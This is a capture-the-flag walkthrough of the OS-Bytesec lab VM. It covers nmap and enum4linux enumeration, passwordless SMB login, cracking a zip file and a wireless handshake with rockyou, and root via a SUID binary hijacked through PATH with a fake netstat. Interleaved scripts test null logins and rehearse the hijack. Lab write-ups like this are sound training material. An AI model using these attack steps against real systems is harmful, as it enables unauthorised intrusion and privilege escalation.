OS-Bytesec walkthrough

OS-Bytesec download here

In this blog post we solve the OS-Bytesec lab. This lab was designed by Rahul Gehlaut.

Network Scanning: I use Netdiscover, a simple ARP scanner, to find live hosts on the network.

netdiscover

As you can see from the image, the VM's IP is 192.168.1.40. Now we can scan that IP with Nmap.

Now let's see which services are running on the remote machine with an aggressive Nmap scan (-A enables OS detection, version detection, default scripts and traceroute). Note that -A on its own only covers the 1000 most common ports; to scan every port, add -p- as well.

nmap -A 192.168.1.40

As can be seen, four ports are open: 80, 139, 445 and 2525.

As port 80 is open, let us open the IP in a browser, as shown in the image below.

During basic enumeration I looked at the web page's source code, and at the bottom of the page there is a hint: ####GET####SMB####Fee

Now enumerate SMB with enum4linux:

enum4linux -A 192.168.1.40

The enumeration turns up three SMB users: Sagar, blackjax and smb. After a few login attempts I find that the smb user can log in without a password.

Log in to the smb share with smbclient as user smb. There is no password, so -N skips the password prompt (the same as pressing Enter at the prompt):

smbclient //192.168.1.40/smb -U smb -N
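To automate the two steps above (take the user list that enum4linux printed and test every account for a passwordless login), here is an added shell script that is not part of the original walkthrough. The host, share name and user names are the ones from the walkthrough; the enum4linux output is a constructed sample in the `user:[name] rid:[0x...]` format enum4linux prints, and the script only contacts the target when smbclient is installed and you pass an argument.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): parse the user list that
# enum4linux -A prints and test each account for a passwordless SMB login.
# Host and share come from the walkthrough; the enum4linux lines below are a
# constructed sample in the "user:[name] rid:[0x...]" format enum4linux prints.

TARGET="${TARGET:-192.168.1.40}"
SHARE="${SHARE:-smb}"

# Constructed sample of enum4linux -A output (only the user lines matter).
SAMPLE_ENUM4LINUX='[+] Getting local users...
user:[Sagar] rid:[0x3e8]
user:[blackjax] rid:[0x3e9]
user:[smb] rid:[0x3ea]
[+] Share Enumeration on 192.168.1.40'

# Read enum4linux output on stdin and print one unique account name per line.
# LC_ALL=C keeps the sort order byte-wise, so it is the same in every locale.
parse_enum4linux_users() {
    sed -n 's/^user:\[\([^]]*\)\] rid:\[[^]]*\].*/\1/p' | LC_ALL=C sort -u
}

# Account names recovered from the constructed sample above.
sample_users() {
    printf '%s\n' "$SAMPLE_ENUM4LINUX" | parse_enum4linux_users
}

# Try one account with an empty password. -N suppresses the password prompt,
# -c 'ls' lists the share and exits; exit status 0 means the login worked.
try_null_login() {
    smbclient "//$TARGET/$SHARE" -U "$1" -N -c 'ls' >/dev/null 2>&1
}

# Run try_null_login for every account name read on stdin and report.
check_null_logins() {
    if ! command -v smbclient >/dev/null 2>&1; then
        echo "smbclient is not installed; skipping login checks" >&2
        return 2
    fi
    while read -r user; do
        if try_null_login "$user"; then
            echo "$user: passwordless login to //$TARGET/$SHARE works"
        else
            echo "$user: login failed"
        fi
    done
}

echo "Accounts found in the sample enum4linux output:"
sample_users

# The network step only runs when an argument is given, e.g. (hypothetical
# file name):  enum4linux -A 192.168.1.40 > enum.txt; ./smbcheck.sh go < enum.txt
# Without an argument only the constructed sample is parsed and nothing is contacted.
if [ "$#" -gt 0 ]; then
    parse_enum4linux_users | check_null_logins
fi
```

The parser is deliberately strict about the line shape so that the share-enumeration and password-policy lines enum4linux also prints are ignored; the login test relies only on smbclient's exit status, which is more reliable than grepping its banner.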

After logging in I find two files in the share, main.txt and safe.zip. Download them to the local system with the get command:

get main.txt
get safe.zip

With the files downloaded, safe.zip turns out to be password-protected, so I crack it with the fcrackzip tool using a dictionary attack with rockyou.txt:

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip

fcrackzip finds the password for safe.zip:

Password: hacker1

Now unzip safe.zip, entering hacker1 at the password prompt:

unzip safe.zip

Unzipping safe.zip gives two files: secret.jpg and user.cap.

user.cap is a wireless packet capture; crack the handshake it contains with aircrack-ng and the rockyou wordlist:

aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap

Cracking the cap file yields a set of SSH credentials: username blackjax and password snowflake.

username: blackjax
password: snowflake

Log in over SSH as blackjax with the password snowflake. Port 22 was not open in the scan, so SSH is the service listening on the non-standard port 2525 found earlier.

The first flag is in blackjax's home directory:

cat user.txt

Privilege Escalation

find / -type f -perm -u=s 2>/dev/null

After the basic enumeration checks (SUID, SGID, kernel exploits, etc.), I saw that /usr/bin/netscan has the SUID bit set, so it runs with the privileges of its owner, root:

I run the binary:

/usr/bin/netscan

From its output it is clear that, behind the scenes, the binary runs the netstat command.

Privilege escalation via the PATH variable: netscan calls netstat by name rather than by absolute path, so it runs whatever netstat is found first in PATH. I go to /tmp, create a fake netstat that launches a shell, mark it executable, and put /tmp at the front of PATH:

echo $PATH
cd /tmp
echo "/bin/bash" > netstat
chmod +x netstat
export PATH=/tmp:$PATH

Then run the binary again:

/usr/bin/netscan
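The following shell script is an added rehearsal of that PATH hijack, not part of the original walkthrough, and it needs no root: a stand-in "victim" script calls netstat by bare name exactly as netscan does, a fake netstat is planted in a writable directory that is pushed to the front of PATH, and a hardened victim that pins PATH first is shown beside it. Every directory and file name in it is temporary and hypothetical.

```shell
#!/bin/sh
# Added example, not from the original walkthrough: a root-free rehearsal of the
# netscan PATH hijack. A stand-in "victim" calls `netstat` by bare name, as the
# SUID binary does, so it runs whatever netstat appears first in PATH. A
# hardened variant pins PATH before the call and is not fooled. All directories
# and file names below are temporary and hypothetical.

WORK="$(mktemp -d)"
REAL_BIN="$WORK/realbin"   # plays the role of /bin (holds the genuine netstat)
EVIL_BIN="$WORK/tmp"       # plays the role of /tmp (attacker-writable)
mkdir -p "$REAL_BIN" "$EVIL_BIN"
trap 'rm -rf "$WORK"' EXIT  # tidy up when the shell exits

# Genuine tool: prints a marker so we can tell which netstat actually ran.
printf '#!/bin/sh\necho real-netstat\n' > "$REAL_BIN/netstat"
chmod +x "$REAL_BIN/netstat"

# Vulnerable victim: bare command name, PATH inherited from the caller.
printf '#!/bin/sh\nnetstat\n' > "$WORK/netscan-vuln"
chmod +x "$WORK/netscan-vuln"

# Hardened victim: resets PATH to a trusted directory before the call
# (invoking /bin/netstat by absolute path would fix it just as well).
printf '#!/bin/sh\nexport PATH=%s\nnetstat\n' "$REAL_BIN" > "$WORK/netscan-safe"
chmod +x "$WORK/netscan-safe"

# Attacker step from the walkthrough. The real payload was "/bin/bash"; here
# the fake just announces itself. chmod +x is required: without it the file is
# not executable and the lookup falls through to the genuine netstat.
plant_fake_netstat() {
    printf '#!/bin/sh\necho hijacked\n' > "$EVIL_BIN/netstat"
    chmod +x "$EVIL_BIN/netstat"
}

# Run a victim with the attacker's directory at the front of PATH (the
# walkthrough's export PATH=/tmp:$PATH) and return what it printed.
run_with_hijacked_path() {
    PATH="$EVIL_BIN:$REAL_BIN:$PATH" "$1"
}

vuln_result() { plant_fake_netstat; run_with_hijacked_path "$WORK/netscan-vuln"; }
safe_result() { plant_fake_netstat; run_with_hijacked_path "$WORK/netscan-safe"; }

echo "vulnerable victim ran: $(vuln_result)"   # hijacked
echo "hardened victim ran:   $(safe_result)"   # real-netstat
```

One caveat for the real box: the payload written into the fake netstat is a plain /bin/bash. That only hands over a root shell because netscan is running fully as root by the time it calls netstat. If a SUID binary had merely raised the effective uid, bash would drop it back to the real uid on startup, and the payload would have to be /bin/bash -p to keep the privileges.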

netscan now executes the fake netstat and I get a root shell. Check with the id command:

id
cd /root

In the root folder I read the flag with cat root.txt.

We got the final root flag.

Author: Rahul Gehlaut

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.
